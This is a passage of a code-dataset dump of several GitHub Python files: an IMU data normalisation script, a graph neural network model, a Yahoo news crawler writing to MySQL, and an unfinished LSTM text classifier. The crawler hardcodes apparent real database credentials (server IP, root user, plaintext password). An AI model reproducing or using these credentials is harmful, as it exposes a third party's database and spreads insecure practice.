'MagX_T', 'MagY_T', 'MagZ_T', 'AccX_R', 'AccY_R', 'AccZ_R', 'GyrX_R',\n 'GyrY_R', 'GyrZ_R', 'MagX_R', 'MagY_R', 'MagZ_R']\n\nSCENARIO = {'R01': 'L01', 'R02': 'L01', 'R03': 'L02', 'R04': 'L02', 'R05': 'L02', 'R06': 'L02', 'R07': 'L02',\n 'R08': 'L02', 'R09': 'L02', 'R10': 'L02', 'R11': 'L02', 'R12': 'L02', 'R13': 'L02', 'R14': 'L02',\n 'R15': 'L02', 'R16': 'L02', 'R17': 'L03', 'R18': 'L03', 'R19': 'L03', 'R20': 'L03', 'R21': 'L03',\n 'R22': 'L03', 'R23': 'L03', 'R24': 'L03', 'R25': 'L03', 'R26': 'L03', 'R27': 'L03', 'R28': 'L03',\n 'R29': 'L03', 'R30': 'L03'}\n\nlabels_persons = {\"S01\": 0, \"S02\": 1, \"S03\": 2, \"S04\": 3, \"S05\": 4, \"S06\": 5, \"S07\": 6, \"S08\": 7, \"S09\": 8,\n \"S10\": 9, \"S11\": 10, \"S12\": 11, \"S13\": 12, \"S14\": 13, \"S15\": 14, \"S16\": 15}\n\ndef read_extracted_data(path, skiprows = 1):\n '''\n gets data from csv file\n data contains 3 columns, start, end and label\n\n returns a numpy array\n\n @param path: path to file\n '''\n\n annotation_original = np.loadtxt(path, delimiter=',', skiprows=skiprows)\n return annotation_original\n\ndef statistics_measurements():\n '''\n Computes some statistics over the channels for the entire training data\n\n returns a max_values, min_values, mean_values, std_values\n '''\n\n #dataset_path_imu = \"/vol/actrec/DFG_Project/2019/LARa_dataset/Motionminers/2019/flw_recordings_12000/\"\n dataset_path_imu = \"/vol/actrec/DFG_Project/2019/LARa_dataset/Mbientlab/LARa_dataset_mbientlab/\"\n \n '''\n #train_final_ids = [\"S07\", \"S08\", \"S09\", \"S10\", \"S11\", \"S12\"]\n\n persons = [\"S07\", \"S08\", \"S09\", \"S13\", \"S14\"]\n #recordings = ['R{:02d}'.format(r) for r in range(1, 31)]\n \n persons = [\"S07\", \"S08\", \"S09\", \"S13\", \"S14\"]\n train_ids = [\"R03\", \"R07\", \"R08\", \"R10\", \"R11\", \"R12\", \"R15\", \"R18\", \"R19\", \"R21\", \"R22\"]\n '''\n \n persons = [\"S07\", \"S08\", \"S09\", \"S10\", \"S11\", \"S12\", \"S13\", \"S14\"]\n train_ids = [\"R01\", \"R02\", \"R03\", \"R04\", \"R05\", \"R06\",\"R07\", \"R08\", \"R09\", \"R10\", \"R13\", \"R14\", \"R16\", \"R17\",\n \"R18\", \"R19\", \"R20\", \"R21\", \"R22\", \"R23\", \"R24\", \"R25\", \"R26\", \"R27\", \"R28\", \"R29\", \"R30\"]\n #val_ids = [\"R12\"]\n #test_ids = [\"R15\"]\n IMU = []\n time = []\n data = []\n\n accumulator_measurements = np.empty((0, 30))\n for P in persons:\n for R in train_ids:\n S = SCENARIO[R]\n file_name_data = \"{}/{}_{}_{}.csv\".format(P, S, P, R)\n file_name_label = \"{}/{}_{}_{}_labels.csv\".format(P, S, P, R)\n print(\"------------------------------\\n{}\".format(file_name_data))\n # getting data\n path=dataset_path_imu + file_name_data\n pathlabels= dataset_path_imu + file_name_label\n try:\n with open(path, 'r') as csvfile:\n spamreader = csv.reader(csvfile, delimiter=',', quotechar='|')\n for row in spamreader:\n try:\n try:\n if spamreader.line_num == 1:\n # print('\\n')\n print(', '.join(row))\n else:\n if len(row) != 31:\n idx_row = 0\n IMU.append(row[idx_row])\n idx_row += 1\n else:\n idx_row = 0\n try:\n time_d = datetime.datetime.strptime(row[idx_row], '%Y-%m-%d %H:%M:%S.%f')\n idx_row += 1\n except:\n try:\n time_d = datetime.datetime.strptime(row[idx_row.astype(int)], '%Y-%m-%d %H:%M:%S')\n idx_row += 1\n except:\n print(\"strange time str {}\".format(time_d))\n continue\n time.append(time_d)\n data.append(list(map(float, row[idx_row:])))\n except:\n print(\"Error in line {}\".format(row))\n except KeyboardInterrupt:\n print('\\nYou cancelled the operation.')\n except:\n print(\"\\n no file called file {}\".format(dataset_path_imu + file_name_data))\n continue\n \n print(len(data[0]))\n print(len(data[1]))\n \n if len(row) != 31:\n imu_data = {'IMU': IMU, 'time': time, 'data': data}\n else:\n try:\n print(\"check\")\n imu_data = {'time': time, 'data': data}\n data_new=np.asarray(data)\n print(data_new.shape)\n print(accumulator_measurements.shape)\n accumulator_measurements = np.append(accumulator_measurements, data_new, axis=0)\n print(\"\\nFiles loaded\")\n except:\n print(\"\\n1 In loading data, in file {}\".format(dataset_path_imu + file_name_data))\n continue\n \n \n try:\n max_values = np.max(accumulator_measurements, axis=0)\n print(\"Max values\")\n print(max_values)\n min_values = np.min(accumulator_measurements, axis=0)\n print(\"Min values\")\n print(min_values)\n mean_values = np.mean(accumulator_measurements, axis=0)\n print(\"Mean values\")\n print(mean_values)\n std_values = np.std(accumulator_measurements, axis=0)\n print(\"std values\")\n print(std_values)\n except:\n max_values = 0\n min_values = 0\n mean_values = 0\n std_values = 0\n print(\"Error computing statistics\")\n \n return max_values, min_values, mean_values, std_values\n\nif __name__ == '__main__':\n \n #Computing Statistics of data\n max_values, min_values, mean_values, std_values = statistics_measurements()\n \n x = []\n x.append(list(max_values))\n x.append(list(min_values))\n x.append(list(mean_values))\n x.append(list(std_values))\n x=np.asarray(x)\n print(x)\n \n base_directory='/data/nnair/cmu/norm/'\n \n csv_dir= base_directory+\"norm_brownie_mgx.csv\"\n print(csv_dir)\n np.savetxt(csv_dir, x, delimiter=\"\\n\", fmt='%s')", "repo_name": "nilahnair/Master_Thesis_2021", "sub_path": "types_normalisation_values_imu.py", "file_name": "types_normalisation_values_imu.py", "file_ext": "py", "file_size_in_byte": 7675, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "numpy.loadtxt", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 77, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 89, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 104, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 104, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 108, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 108, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 181, "usage_type": "call"}]} +{"seq_id": "17200202499", "text": "import torch\nimport torch.nn as nn\nfrom torch.nn import ModuleList, Dropout, ReLU\nfrom torch_geometric.nn import GCNConv, RGCNConv, SAGEConv, GINConv, FiLMConv, global_mean_pool\n\nclass RGINConv(torch.nn.Module):\n def __init__(self, in_features, out_features, num_relations):\n super(RGINConv, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.num_relations = num_relations\n self.self_loop_conv = torch.nn.Linear(in_features, out_features)\n convs = []\n for i in range(self.num_relations):\n convs.append(GINConv(nn.Sequential(nn.Linear(in_features, out_features),nn.BatchNorm1d(out_features), nn.ReLU(),nn.Linear(out_features, out_features))))\n self.convs = ModuleList(convs)\n def forward(self, x, edge_index, edge_type):\n x_new = self.self_loop_conv(x)\n for i, conv in enumerate(self.convs):\n rel_edge_index = edge_index[:, edge_type==i]\n x_new += conv(x, rel_edge_index)\n return x_new\n\nclass GCN(torch.nn.Module):\n def __init__(self, args):\n super(GCN, self).__init__()\n self.args = args\n self.num_relations = args.num_relations\n self.layer_type = args.layer_type\n num_features = [args.input_dim] + list(args.hidden_layers) + [args.output_dim]\n self.num_layers = len(num_features) - 1\n layers = []\n for i, (in_features, out_features) in enumerate(zip(num_features[:-1], num_features[1:])):\n layers.append(self.get_layer(in_features, out_features))\n self.layers = ModuleList(layers)\n\n self.reg_params = list(layers[0].parameters())\n self.non_reg_params = list([p for l in layers[1:] for p in l.parameters()])\n\n self.dropout = Dropout(p=args.dropout)\n self.act_fn = ReLU()\n def get_layer(self, in_features, out_features):\n if self.layer_type == \"GCN\":\n return GCNConv(in_features, out_features)\n elif self.layer_type == \"R-GCN\":\n return RGCNConv(in_features, out_features, self.num_relations)\n elif self.layer_type == \"GIN\":\n return GINConv(nn.Sequential(nn.Linear(in_features, out_features),nn.BatchNorm1d(out_features), nn.ReLU(),nn.Linear(out_features, out_features)))\n elif self.layer_type == \"R-GIN\":\n return RGINConv(in_features, out_features, self.num_relations)\n elif self.layer_type == \"SAGE\":\n return SAGEConv(in_features, out_features)\n elif self.layer_type == \"FiLM\":\n return FiLMConv(in_features, out_features)\n def reset_parameters(self):\n for layer in self.layers:\n layer.reset_parameters()\n\n def forward(self, graph):\n x, edge_index = graph.x, graph.edge_index\n for i, layer in enumerate(self.layers):\n if self.layer_type in [\"R-GCN\", \"R-GIN\"]:\n x = layer(x, edge_index, edge_type=graph.edge_type)\n else:\n x = layer(x, edge_index)\n if i != self.num_layers - 1:\n x = self.act_fn(x)\n x = self.dropout(x)\n return x\n", "repo_name": "Fsoft-AIC/Batch-Ollivier-Ricci-Flow", "sub_path": "models/node_model.py", "file_name": "node_model.py", "file_ext": "py", "file_size_in_byte": 3134, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "41", "api": [{"api_name": "torch.nn", "line_number": 6, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 12, "usage_type": "attribute"}, {"api_name": "torch_geometric.nn.GINConv", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn.ModuleList", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "attribute"}, {"api_name": "torch.nn.ModuleList", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.nn.Dropout", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 41, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GCNConv", "line_number": 44, "usage_type": "call"}, {"api_name": "torch_geometric.nn.RGCNConv", "line_number": 46, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GINConv", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 48, "usage_type": "call"}, {"api_name": "torch_geometric.nn.SAGEConv", "line_number": 52, "usage_type": "call"}, {"api_name": "torch_geometric.nn.FiLMConv", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "29746817201", "text": "# for dbmaker\n# for ettoday\n# 日期往前抓一個月\n# coding=utf-8\nfrom lxml import etree, html\nfrom lxml.html import fromstring\nfrom time import sleep\nfrom datetime import datetime, date, time, timedelta\nimport requests, json, pyodbc, threading, queue\nimport sys\nimport MySQLdb\n\nclass Constant:\n URL_Root = \"https://tw.news.yahoo.com/\"\n URL_Entrance = \"https://tw.news.yahoo.com/finance\"\n WORKERLIMIT = 1\n\nclass News:\n def __init__(self, category, url):\n self.category = category\n self.entranceUrl = url\n self.url = Constant.URL_Root + url\n self.lastNewsPublished = \"\"\n self.cnxn = MySQLdb.connect(\"139.162.23.125\", \"root\", \"DifficulT7130\", \"cybersite\", use_unicode=True, charset=\"utf8\")\n writeLog ('I', \"connect to database\")\n def do(self):\n #self.cnxn = pyodbc.connect('Driver={DBMaker 5.4 Driver};Database=CYBERSITE;Uid=SYSADM;Pwd=;')\n self.cursor = self.cnxn.cursor()\n writeLog ('I', \"search: (%s)\" % (self.category))\n\n # 可否再透過日期查詢下去\n canSearchAgain = True\n\n # 目前日期查詢結果有無下一頁可搜尋\n hasNextPage = True\n\n while canSearchAgain:\n canSearchAgain = False\n hasNextPage = True\n while hasNextPage:\n hasNextPage = False\n result = tryRequestURL(threading.current_thread().name, self.entranceUrl)\n print (self.entranceUrl)\n root = fromstring(result.text)\n news = root.xpath(\"//div[@class='Ov(h) Pend(44px) Pstart(25px)']/h3/a | //div[@class='Ov(h) Pend(14%) Pend(44px)--sm1024']/h3/a \")\n print (len(news))\n if len(news) == 0:\n writeLog('W', \"search: (%s) no result\" % self.category)\n self.lastNewsPublished = \"\"\n return\n for new in news:\n self.fetchNewsContent(Constant.URL_Root+new.get('href'))\n\n writeLog('I', \"category: %s, run end of page\" % self.category)\n\n self.cursor.close()\n self.cnxn.close()\n\n def fetchNewsContent(self, url):\n result = tryRequestURL(threading.current_thread().name, url)\n root = fromstring(result.text)\n newspublished = root.xpath(\"//time[@class='date Fz(13px) Fw(n) D(tbc) Va(m) D(ib)']\")\n if len(newspublished) == 0:\n writeLog('W', \"error to parse timestamp in url: %s\" % url)\n return\n else:\n newspublished = newspublished[0].text.strip()\n newspublished = datetime.strptime(newspublished, \"%Y年%m月%d日\")\n\n headline = root.xpath(\"//h1[@class='Lh(1.39) Fz(25px)--sm Fz(36px) Ff($ff-primary) Lts($lspacing-md) Fw($fweight) Fsm($fsmoothing) Fsmw($fsmoothing) Fsmm($fsmoothing) Wow(bw)']\")\n if len(headline) == 0:\n writeLog('W', \"error to parse headline in url: %s\" % url)\n return\n else:\n headline = headline[0].text\n\n author = root.xpath(\"//div[@class='author-name C(#000) Fw(b)'] | //a[@class='C(#222)'] | //a[@class='author-link Td(u):h C(#000) Fw(b)']\")\n if len(author) == 0:\n writeLog('W', \"error to parse author in url: %s\" % url)\n return\n else:\n author = author[0].text\n\n contents = root.xpath(\"//div[@class='canvas-body Wow(bw) Cl(start) Mb(20px) Lh(1.7) Fz(18px) D(i)']/p\")\n if len(contents) == 0:\n writeLog('W', \"error to parse content in url: %s\" % url)\n return\n else:\n for c in contents[0:5]:\n authorDict = c.text_content().split('/')\n\n writeLog('I', 'headline: %s, category: %s, newspublished: %s' % (headline, self.category, newspublished))\n writeLog('I', 'author: %s' % (author))\n self.lastNewsPublished = str(newspublished)\n self.insert_data(headline, \"\\n\".join([c.text_content().strip() for c in contents]), author, newspublished, url, self.category)\n\n def insert_data(self, headline, paragraph, author, createtime, url, category):\n writeLog(\"I\", \"[%s], search record: %s, %s\" % (threading.current_thread().name, headline, author))\n paragraph = paragraph.replace(\"\\n\", \"\")\n while True:\n try:\n self.cursor.execute(\"select count(*) from yahoo where headlines=%s and author=%s\" , (headline, author))\n break\n except pyodbc.Error as err:\n writeLog('E', \"dbmaker err happened in find duplicate record: %s\" % err)\n self.reconnectDB()\n else:\n writeLog('E', \"dbmaker didn't caught err with find duplicate record\")\n self.reconnectDB()\n\n row = self.cursor.fetchone()\n if row[0] != 0:\n writeLog(\"I\", '[%s], headline: %s already in record' % (threading.current_thread().name, headline))\n else:\n while True:\n try:\n djson ={\"JHEADLINE\":headline,\"JCONTENT\":paragraph,\"JCATEGORY\":category,\"JAUTHOR\":author,\"JNEWSPUBLISHED\":str(createtime),\"JURL\":url}\n myjson = json.dumps(djson)\n self.cursor.execute(\"insert into yahoo (headlines, content, author, newspublished, url, category,djson) values (%s,%s,%s,%s,%s,%s,%s)\", (headline, paragraph, author, createtime, url, category,myjson))\n self.cnxn.commit()\n writeLog(\"I\", '[%s], headline: %s insert success' % (threading.current_thread().name, headline))\n break\n except pyodbc.Error as err:\n writeLog('E', \"dbmaker err happened in insert new record: %s\" % err)\n self.reconnectDB()\n else:\n writeLog('E', \"dbmaker didn't caught err with condition insert new record\")\n self.reconnectDB()\n return True\n\n def reconnectDB(self):\n writeLog('I', \"start to reconnect connection\")\n #self.cnxn = pyodbc.connect('Driver={DBMaker 5.4 Driver};Database=CYBERSITE;Uid=SYSADM;Pwd=;')\n self.cnxn = MySQLdb.connect(\"139.162.23.125\", \"root\", \"DifficulT7130\", \"cybersite\", use_unicode=True, charset=\"utf8\")\n self.cursor = self.cnxn.cursor()\n\n###### global function ######\n\ndef getSelectConditions():\n categoryDict = []\n result = tryRequestURL('main', Constant.URL_Entrance)\n root = fromstring(result.text)\n categorys = root.xpath(\"//div[@id='nr-secondtier-nav-main']/div/ul/li/a\")\n idx = 0\n for category in categorys[0:]:\n idx = idx + 1\n if idx == 2 or idx == 3:\n continue\n if idx > 5:\n break\n categoryDict.append({'name': category.get('title'), 'url': category.get('href')})\n print (category.get('title'))\n return categoryDict\n\ndef tryRequestURL(threadName, url):\n tryTimes = 5;\n result = \"\"\n while tryTimes > 0:\n try:\n result = requests.get(url, timeout=10)\n except requests.exceptions.Timeout as e:\n writeLog(\"W\", '[%s], timeout err: %s' % (threadName, e))\n tryTimes -= 1\n writeLog(\"W\", '[%s], last %d retry chance' % (threadName, tryTimes))\n sleep(3)\n continue\n except requests.exceptions.ReadTimeout as e:\n writeLog(\"W\", '[%s], read timeout err: %s' % (threadName, e))\n tryTimes -= 1\n writeLog(\"W\", '[%s], last %d retry chance' % (threadName, tryTimes))\n sleep(3)\n continue\n except requests.packages.urllib3.exceptions.ReadTimeoutError as e:\n writeLog(\"W\", '[%s], urllib3 read timeout err: %s' % (threadName, e))\n tryTimes -= 1\n writeLog(\"W\", '[%s], last %d retry chance' % (threadName, tryTimes))\n sleep(3)\n continue\n except requests.exceptions.TooManyRedirects as e:\n writeLog(\"W\", '[%s], too many redirect %s' % (threadName, e))\n tryTimes -= 1\n writeLog(\"W\", '[%s], last %d retry chance' % (threadName, tryTimes))\n sleep(3)\n continue\n except requests.exceptions.RequestException as e:\n writeLog(\"W\", '[%s], request error: %s' % (threadName, e))\n tryTimes -= 1\n writeLog(\"W\", '[%s], last %d retry chance' % (threadName, tryTimes))\n sleep(3)\n continue\n break\n if result != \"\":\n result.encoding='utf8'\n return result\n\ndef writeLog(level, message):\n global file_\n message = \"Log %s %s %s\" % (level, datetime.now().time(), message)\n file_.write(\"%s\\n\" % message)\n #print(message)\n\ndef startCrawler(*args):\n queue = args[0]\n while queue.qsize() > 0:\n job = queue.get()\n job.do()\n\n###### end of global function ######\n\ndef main():\n global file_\n que = queue.Queue()\n\n selections = getSelectConditions()\n for category in selections:\n que.put(News(category['name'], category['url']) )\n\n writeLog(\"I\", \"[Info] Worker size={%d}...\" % que.qsize())\n\n newsList = []\n\n # 將任務分配給thread\n for i in range(Constant.WORKERLIMIT):\n worker = threading.Thread(target=startCrawler, name='thd%d' % i, args=(que,))\n newsList.append(worker)\n worker.start()\n\n for i in range(Constant.WORKERLIMIT):\n newsList[i].join()\n\n writeLog(\"I\", 'all thread done')\n file_.close()\n\nif __name__ == \"__main__\":\n file_ = open('yahoo.log', mode='a', encoding='utf-8')\n main()\n", "repo_name": "lisa850728g/crawler", "sub_path": "yahoo.py", "file_name": "yahoo.py", "file_ext": "py", "file_size_in_byte": 9523, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "MySQLdb.connect", "line_number": 24, "usage_type": "call"}, {"api_name": "threading.current_thread", "line_number": 42, "usage_type": "call"}, {"api_name": "lxml.html.fromstring", "line_number": 44, "usage_type": "call"}, {"api_name": "threading.current_thread", "line_number": 60, "usage_type": "call"}, {"api_name": "lxml.html.fromstring", "line_number": 61, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 68, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 68, "usage_type": "name"}, {"api_name": "threading.current_thread", "line_number": 98, "usage_type": "call"}, {"api_name": "pyodbc.Error", "line_number": 104, "usage_type": "attribute"}, {"api_name": "threading.current_thread", "line_number": 113, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 118, "usage_type": "call"}, {"api_name": "threading.current_thread", "line_number": 121, "usage_type": "call"}, {"api_name": "pyodbc.Error", "line_number": 123, "usage_type": "attribute"}, {"api_name": "MySQLdb.connect", "line_number": 134, "usage_type": "call"}, {"api_name": "lxml.html.fromstring", "line_number": 142, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 160, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 161, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 165, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 167, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 171, "usage_type": "call"}, {"api_name": "requests.packages", "line_number": 173, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 177, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 179, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 183, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 185, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 189, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 198, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 198, "usage_type": "name"}, {"api_name": "queue.qsize", "line_number": 204, "usage_type": "call"}, {"api_name": "queue.get", "line_number": 205, "usage_type": "call"}, {"api_name": "queue.Queue", "line_number": 212, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 224, "usage_type": "call"}]} +{"seq_id": "71138603005", "text": "import os\r\nimport jieba\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport math\r\n\r\ntrain_dir = './data/text_category/train'\r\ntrain_segment_dir = './data/text_category/train_segment.txt'\r\ntrain_list_dir = './data/text_category/train_list.txt'\r\n\r\n\r\n# 将文件中的句子通过jieba库拆分为单个词\r\ndef segment_word(input_file, output_file):\r\n # 循环遍历训练数据集的每一个文件\r\n for root, folders, files in os.walk(input_file):\r\n print('root:', root)\r\n for folder in folders:\r\n print('dir:', folder)\r\n for file in files:\r\n file_dir = os.path.join(root, file)\r\n with open(file_dir, 'rb') as in_file:\r\n # 读取文件中的文本\r\n sentence = in_file.read()\r\n # 通过jieba函数库将句子拆分为单个词组\r\n words = jieba.cut(sentence)\r\n # 文件夹路径最后两个字即为分类名\r\n content = root[-2:] + '\\t'\r\n # 去除词组中的空格,排除为空的词组\r\n for word in words:\r\n word = word.strip(' ')\r\n if word != '':\r\n content += word + ' '\r\n # 换行并将文本写入输出文件\r\n content += '\\n'\r\n with open(output_file, 'a') as outfile:\r\n outfile.write(content.strip(' '))\r\n\r\n\r\n# 统计每个词出现的频率\r\ndef get_list(segment_file, out_file):\r\n # 通过词典保存每个词组出现的频率\r\n word_dict = {}\r\n with open(segment_file, 'r') as seg_file:\r\n lines = seg_file.readlines()\r\n # 遍历文件的每一行\r\n for line in lines:\r\n line = line.strip('\\r\\n')\r\n # 将一行按空格拆分为每个词,统计词典\r\n for word in line.split(' '):\r\n # 如果这个词组没有在word_dict词典中出现过,则新建词典项并设为0\r\n word_dict.setdefault(word, 0)\r\n # 将词典word_dict中词组word对应的项计数加一\r\n word_dict[word] += 1\r\n # 将词典中的列表排序,关键字为列表下标为1的项,且逆序\r\n sorted_list = sorted(word_dict.items(), key=lambda d: d[1], reverse=True)\r\n with open(out_file, 'w') as outfile:\r\n # 将排序后的每条词典项写入文件\r\n for item in sorted_list:\r\n outfile.write('%s\\t%d\\n' % (item[0], item[1]))\r\n\r\n\r\n# segment_word(train_dir, train_segment_dir)\r\n# get_list(train_segment_dir,train_list_dir)\r\n\r\n# 通过RNN网络进行文本分类训练\r\n# 1、封装数据集类,提供接口next_batch用于连续批次数据读取\r\n# 2、封装词表,将句子转化为词语id。类别封装,将输入词语类别转为id\r\n# 3、构建网络模型,输入进行embedding,之后经过LSTM层,全连接层,然后进行训练\r\n\r\n# 定义超参数\r\nembedding_size = 32 # 每个词组向量的长度\r\nmax_words = 10 # 一个句子最大词组长度\r\nlstm_layers = 2 # lstm网络层数\r\nlstm_nodes = [64, 64] # lstm每层结点数\r\nfc_nodes = 64 # 全连接层结点数\r\nbatch_size = 100 # 每个批次样本数据\r\nlstm_grads = 1.0 # lstm网络梯度\r\nlearning_rate = 0.001 # 学习率\r\nword_threshold = 10 # 词表频率门限,低于该值的词语不统计\r\nnum_classes = 4 # 最后的分类结果有4类\r\n\r\n\r\n\r\nclass Word_list:\r\n def __init__(self, filename):\r\n # 用词典类型来保存需要统计的词组及其频率\r\n self._word_dic = {}\r\n with open(filename, 'r') as f:\r\n lines = f.readlines()\r\n for line in lines:\r\n res = line.strip('\\r\\n').split('\\t')[0:2]\r\n if len(res) < 2:\r\n continue\r\n else:\r\n word, freq = res\r\n if freq.isdigit():\r\n freq = int(freq)\r\n else:\r\n continue\r\n # 如果词组的频率小于阈值,跳过不统计\r\n if freq < word_threshold:\r\n continue\r\n # 词组列表中每个词组都是不重复的,按序添加到word_dic中即可,下一个词组id就是当前word_dic的长度\r\n word_id = len(self._word_dic)\r\n self._word_dic[word] = word_id\r\n\r\n def sentence2id(self, sentence):\r\n # 将以空格分割的句子返回word_dic中对应词组的id,若不存在返回-1\r\n sentence_id = [self._word_dic.get(word, -1)\r\n for word in sentence.split()]\r\n return sentence_id\r\n\r\n\r\ntrain_list = Word_list(train_list_dir)\r\n\r\n\r\nclass TextData:\r\n def __init__(self, segment_file, word_list):\r\n self.inputs = []\r\n self.labels = []\r\n # 通过词典管理文本类别\r\n self.label_dic = {'体育': 0, '校园': 1, '女性': 2, '文学': 3}\r\n self.index = 0\r\n\r\n with open(segment_file, 'r') as f:\r\n lines = f.readlines()\r\n for line in lines:\r\n # 文本按制表符分割,前面为类别,后面为句子\r\n res = line.strip('\\r\\n').split('\\t')[0:2]\r\n if len(res) < 2:\r\n continue\r\n else:\r\n label, content = res\r\n self.content_size = len(content)\r\n # 将类别转换为数字id\r\n label_id = self.label_dic.get(label)\r\n # 将句子转化为embedding数组\r\n content_id = word_list.sentence2id(content)\r\n # 如果句子的词组长超过最大值,截取max_words长度以内的id值\r\n content_id = content_id[0:max_words]\r\n # 如果不够则填充-1,直到max_words长度\r\n padding_num = max_words - len(content_id)\r\n content_id = content_id + [-1 for i in range(padding_num)]\r\n self.inputs.append(content_id)\r\n self.labels.append(label_id)\r\n self.inputs = np.asarray(self.inputs, dtype=np.int32)\r\n self.labels = np.asarray(self.labels, dtype=np.int32)\r\n self._shuffle_data()\r\n\r\n # 对数据按照(input,label)对来打乱顺序\r\n def _shuffle_data(self):\r\n r_index = np.random.permutation(len(self.inputs))\r\n self.inputs = self.inputs[r_index]\r\n self.labels = self.labels[r_index]\r\n\r\n # 返回一个批次的数据\r\n def next_batch(self, batch_size):\r\n # 当前索引+批次大小得到批次的结尾索引\r\n end_index = self.index + batch_size\r\n # 如果结尾索引大于样本总数,则打乱所有样本从头开始\r\n if end_index > len(self.inputs):\r\n self._shuffle_data()\r\n self.index = 0\r\n end_index = batch_size\r\n # 按索引返回一个批次的数据\r\n batch_inputs = self.inputs[self.index:end_index]\r\n batch_labels = self.labels[self.index:end_index]\r\n self.index = end_index\r\n return batch_inputs, batch_labels\r\n\r\n # 获取词表数目\r\n def get_size(self):\r\n return self.content_size\r\n\r\n\r\n# 训练数据集对象\r\ntrain_set = TextData(train_segment_dir, train_list)\r\n# print(data_set.next_batch(10))\r\n# 训练数据集词组条数\r\ntrain_list_size = train_set.get_size()\r\nprint('列表长度', train_list_size)\r\n\r\n\r\n# 创建计算图模型\r\ndef create_model(list_size, num_classes):\r\n # 定义输入输出占位符\r\n inputs = tf.placeholder(tf.int32, (batch_size, max_words))\r\n outputs = tf.placeholder(tf.int32, (batch_size,))\r\n # 定义是否dropout的比率\r\n keep_prob = tf.placeholder(tf.float32, name='keep_rate')\r\n # 记录训练的总次数\r\n global_steps = tf.Variable(tf.zeros([], tf.float32), name='global_steps', trainable=False)\r\n\r\n # 将输入转化为embedding编码\r\n with tf.variable_scope('embedding',\r\n initializer=tf.random_normal_initializer(-1.0, 1.0)):\r\n embeddings = tf.get_variable('embedding', [list_size, embedding_size], tf.float32)\r\n # 将指定行的embedding数值抽取出来\r\n embedded_inputs = tf.nn.embedding_lookup(embeddings, inputs)\r\n\r\n # 实现LSTM网络\r\n # 生成Cell网格���需参数\r\n def _generate_paramas(x_size, h_size, b_size):\r\n x_w = tf.get_variable('x_weight', x_size)\r\n h_w = tf.get_variable('h_weight', h_size)\r\n bias = tf.get_variable('bias', b_size, initializer=tf.constant_initializer(0.0))\r\n return x_w, h_w, bias\r\n\r\n scale = 1.0 / math.sqrt(embedding_size + lstm_nodes[-1]) / 3.0\r\n lstm_init = tf.random_uniform_initializer(-scale, scale)\r\n with tf.variable_scope('lstm_nn', initializer=lstm_init):\r\n '''\r\n # 通过库函数构建两层的lstm,每层结点数为lstm_nodes[i]\r\n cells = []\r\n for i in range(lstm_layers):\r\n cell = tf.contrib.rnn.BasicLSTMCell(lstm_nodes[i], state_is_tuple=True)\r\n # 实现Dropout操作\r\n cell = tf.contrib.rnn.DropoutWrapper(cell, output_keep_prob=keep_prob)\r\n cells.append(cell)\r\n # 合并两个lstm的cell\r\n cell = tf.contrib.rnn.MultiRNNCell(cells)\r\n # 将embedded_inputs输入到RNN中进行训练\r\n initial_state = cell.zero_state(batch_size, tf.float32)\r\n # 